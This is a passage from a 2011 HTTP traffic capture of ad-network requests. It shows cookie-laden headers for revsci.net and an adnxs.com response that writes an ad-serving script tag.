NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kpy6i0cJxPYkHXgOPSTi5CoyeFhnHJRt6fLr+1OVRdX4nuCZzfuQ1VVG5sVtQXpfs93UPetTR+8CjuUaU8qI8jPKp1c+1oFzm2RW+nTi7lTLQCZ+axJebX8rUBsWyiOwvAlEla/ilc0yBK6+tzryJwZMa1HEpun+Puz+CpaUf+Y00G82XdBWMgeDBrpnrxVALpF12tvSNuZhoCA==; rsiPus_bjrC="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDE7NFqnKkHLx2BmYMObzB9/hpep6V9WP6iKbjeLhnxvCqNxuQAmHiwdDZ+f+xJ0E7g8jzc0DvGDoKVMLvpTHQqNyQHs6Exm0FAA/O2NUr6lEfJ7PQxE4W0VlVk6aXC4v9duVv1shaCwE0LAZ/Bx8Tb5hef+cEj3PLqxCnUQpfvYd7Vmm3clsezaQ3RSUGkvJtHdZ2YTGmaYEJUPbXW9WEH8qQzgpkYeDrPBH1U3bu+gJAgpsWhbrbPB62kbK9yKfTZIckBovzggyzOFwlJow83837Vp38X8J6UZ2pVRtPjL9j/uGFvaLASC9sca4eoyy1DiNYTbqM/IN0HsfsODfE/dlINqck0SuIicSHmxj6EAhObo6wIsaafDGE9dV8TyVXBo9Sr9044Ur/dRo2tn2Xw7pHX6mFkmzpuFbt1ZIR6ORC1hfMXvtKxQ3NpSyty5OFgEYkmuhKYFbFUB72lce0ts/ZWiQjV6smi6UujDfw6Yr0L1vMv1Jsna53BNhbvfJ2B08tqGXAV3vpJiDAtOJ0/CoKAPSG4e1qTnYvsLujwSsgeE/hpOstHVIZFS5jG7vOR0oYtjTMikoHR1Q1hjjKIZ/9TnXzaveyRGvBoaBt4YG3VTFSJEqIUtasV7CnjWTIvnlpWxDjc6OTo8BtlLw60LE4N3KdqbrpN0K7qAy76PhvFFYAgAbaPJNH8dXvCLCIdhJOcvm2UxwBWjcmnMmB5AjZu7tgCyGEuhEEv7sPyRc+T5nVtAYcxwHTY/H6RLgcJ7CdaBewn8gjUDrjMI6OTz2mrv6wPyDuIsIOVptpv8nTZRLacFpfvjcOnWQLZ+kMhecnNRPMgIoh+NU2sUuvyJTKBG9REg/P9a9MerxR8tW3Y5mWuZotrHq0vNX47iVAJI0Xlx0cvhd762Y2mq7CT8Mvbid9AIN5qqjJK1cuiKxnOvWrZ51MnAMQqA5UPUeoEZx75ArW3b7buDiQhQVw4CgF0cjOcMJqDqOQYGsqap8vpmJBWNnS7SbgiYqpXeT1x1s9DnlC0RFkAQsb4wqPPekz6i0ZtPjrDUo+cJIBfL1BlSYKc18etrK/Cg3ZPrZqdvIHp6VzZLOixqOtCKtElY4kh2DEYWEUWzepHNrbkpmEP1ktDcuojdoRfUcr5GE+1F3Q1CBzoV9zdnJC4ggvXN2BBcl1JSbG0P0d6PjNEtyg8il6zrUrZZuCG7fvfb0P4lQLism3igStz5Uq7Fb7O9syCEMy+HjeVUK5zG5tnMi+u5709LXeI/l7kLTEDO4kRaDQ+bD93P+QxIuFerYQ6QQ7QGa+KSvFFqt8uAPd6wMRH2je8EahQprDQTw=="; rsiPus_SZ7X="MLsXtSMNZzhvJZH0ecXcxPALrEtuUCF+EhmSrU9X53YJybh8eM9OR5om4StALLEl9sEMIKnCoBr4ThgQyPsjf9nPZuNEb4EUj7wGDPWNrTVw1j+2QxLF8RWiqhraX7I4lUnumsV/sixRxjRF5rWB9KnHODU3B/yiV30fU5WC6bOj1fDBV0DAs57Y1VM/Rqbb8VtJJSmdPuodbAFaDfdpDm6REm++yUZWODiA1PgSsK1mOBwVrBpyopchY+4OgBAcnNdBu7w/L+p4vkz7xq5Goy6VfiZ0TNBjdPo/v4CQdQttHJakZm+gPoRcnr8XH/OT/ssNoszQO2+/85IsNVqe/S5WX7jFDwYhMvDn5Dt5mB4fbOeHmBd8VRWNeibvCxdfhK2hc22Jnbs9ab301GfTUNS0KHNnyiz21S4XvPj2TGf+ubFq1Kbspi+Iy/u71WjfDeK6UVxhXUFRtNWRI+eAnzZ3LEmi3WB2PXsOqbHWAKKHyRe9v89iY73LDgm+3fBpoycGDWPFK/RsHJeHPSrtr4UAuN95pWG2/nrmDbSKCrywWqPGdlQR9/zVsvELKVta8Kb2hXgRB5SeKT4I8Qvw7LX27/fRNi/bSmgvXKzRe1hUqlRjX6XHPs0QHeDkvFoNHBHR6Ajw/tGbgLmqpOJgUt9o7kPaVvBif5zEnTpsaxS8IFKfcU+dxfWI8/CmxnYNsY7g8GpNG7aJYb9HmVwGkWUX8LwsrPfKf1pgUYxUwW6GC3lsElPdse8nLrO8xk63FbSLMq3mnzxnapoMGv13ssmyiWG7yfcatekVhCSNFYxh0/O4PhyFtH6aFfMTxZfhpvML3RCDz29z37uiFi/eAbIUlpaUtoxGe65dW0XNADXYxLM76mZA6B1NGvgLlNfdq1MdqZhZ2y9FPoHxQfhpPEdXHQHUTX8tS3khPjHiNVKZn/5bhj+gqcGf/oQMfZcoN3Dp6DcfYtghhM0eIgvjfMN0Jve6yZc402lIKLKSKBwrQdy/Ei6zTKKN66pb/n3jAd9a27M0/ZlWlqomT2Hj4S2MhD+z5axkLPP4YCgoRArhJsGijHKrvfElV/1yUCwkwEUibEPkClwAXnsJOoHSPdyZj4n6XfDf0Mr4tvd5wxRldis09GU2b6TQfka5eghlB5Gl9fE0b1lhP2hTperFRqJFCirRGPhW17dFNR5Wk1TQ3YCC9MODW3N3Gn5eOWUW/Csp76CWctZQVuOtFIlMP88TBXkoNgIVYUXxIEcco7/XHOd81bVaWrJMUoW/d6QS+puM+pHyjLbFvsZfXSNj3f20WXBKOIzVpmZism01RaqPJ/SLNkwdY7hUZuYE1k8/V9PjVOfORXn9i6+dDy+w5TA="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/zotBv0OXJiczDnb++8r/x9cboBDwW00GG7hva5IIx81wm4vtfjNktUmVF/5C6yfUn7k+WYUV3ECFN3pSpL8cGgBFDqkHe/o52XtD75xYzoIMRn7E0P7DlipjQz4QNhurmwSlvYpuxNHnaznP/JBCcOyBj4d5DyfgTVB+yyeNMcwEesXWx4Nk8Qln6Z5TvAdsntlk6mho2KcC+ZrzsPFC9Bgxy6qgpCpo5c38/g8Zwj/y35sO9Cnea0pyTEM8/IwG4gPavU+Gn5R7/nu6Mmd7C1OD5YM8jNXNLr9p/3t0ZAddAb7VXBJDm2efT8pu65sl6BoMyCy39MxKe7ZTIj8/0a7oy/QI+Lqq7Dfz4oLs1K7vfflWpyRUq3yHAMvwtSpIV6p730Q+EQVw+ZCzoIXWql+HLUfMh2mNs8YZD/HWET1lYrnDtpSXNlU/w01miBfnq6HIVzALy6lQcnIzrou7iQaYlbN3PINi/YtkLkB+1X09DMXq8Kxya/goLxHfth5ZtoFL2kQEUZaCxqBX6ENJCg0EC6bS+LJ04CK5P9gPctRmM5RIj5Ia9qr29k7uT5Y/x00fSErdDs4qDHTwsbtrFOb9aieSI10oWf7rdt434Cu50GQczE6QI6w2rnb4a3PVo/Q43Y0dEPEFCUIwxuGIpeD+g351hGAFhi0NBE+GqKdjw/aKnLKFftBAw3ZtfGMQLskKAbJ1uA4hWdUkcbUur+n8vJ8KeaY9g+FEiPuysk3UB1EnShP2fO4dI8v8MySVDt/PgQB0SuruCEWgF1oALgpaM9ds+JdiTLxevJ2pKIpAN0TAu4vB7C9+oi8WGl3BFDWADMhB9tEqNLHj+QReqAbblTXO+0Fao4ngfgqrN2TQFWWaOptLA/dMSU2rJJJBd50TeuVH5PIRurXCB/HR+udAw7vZ111gu3we846cnq8NDUohC2mGKIo+MYUANfl7mp1EH9XRY4d7jSWKgqwSFifHcMdiCtT2fJWPdPvf9ott0sj0KAjqvglA2rXRWHEQsY8gh+30uSBg55yo6tLMlQkKts2L9S5Ye1k72Ehgu9xeLwYzfZsZ8xEExAOxLFrE0Snn+O4T1y3iueXECEKftTScXRzpCsyOdAzYhhg4ZTQtujB0mEPD+ELgknFRnQze8DWyOze471+OhcuVoIJUEpjLZbHrxnBqXYBCF5AzK46mfVZ7IY/OVAGlDDGhX1hJ5l6PJudk2D5zc3lCOpAJipzS7S2QnTOBhw6RhMM25pIpmfDDfh/CHU6sZh9LQFR+dgdYZdrbxH3P7wttjQDITcOSaGwHPt86LSHS4PFtBcqpwrGw8Y9ASmBFC5Y/1lvIGCdNhjDmYdy611TnhkKU3WLdh550O2NfVbB7SmXytkIw7EOJMPb7glUobNTFDf57WbY+hkCHaICapIfleMOMzsyXzWmm/r0lEiaiGWlZ6NAKyMzTRzJtSAJJuu8pInHFdzaPdXuCzod3/5ZAYdEo4kyreOwbSeIRuR80/PxHnv+pcUMMmBl9/sQTF7sptNbiMAmrqTX4wXKyLlfn0AZWo5xJ72ILnpIBNat7RXJ7aGJgrJbXgP9b2H3E4/4BNITDrOzrZrr4zm4r+wXAyllqsEeVFu7Az5ZARlmUo0nhL7DbexToJ7NTL6de4VIUXKoB7/OUEJN0CZT2LSez2G3Hgzz0ZZYVLvR2tXfSEmJkeYzwQhsGjPoV5Sjy8APp0TX20ySt6P0ygHXl0keELI3HTra5m7YTEXvH/nW3+wD8Q"

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 17-Jun-2011 16:18:02 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 16 Jun 2011 16:18:02 GMT
Content-Length: 1075

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=300x250&referrer=http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf%3Ft=1308241078986%26tz=300%26m=0%26hu=%26ht=js%26hp=0%26fo=%26url=UniversalAudiencePlatform23.com%26refer=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860&inv_code=1457934&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D1457934%26r%3D0%26_salt%3D1248176818%26u%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F300x250%252Fatf%253Ft%253D1308241078986%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%26u%3Dhttp%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308241078986%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860"></scr'+'ipt>');

Request 2

GET /imp?Z=300x250&s=1457934&r=0&_salt=1248176818&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1308241078986%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4Il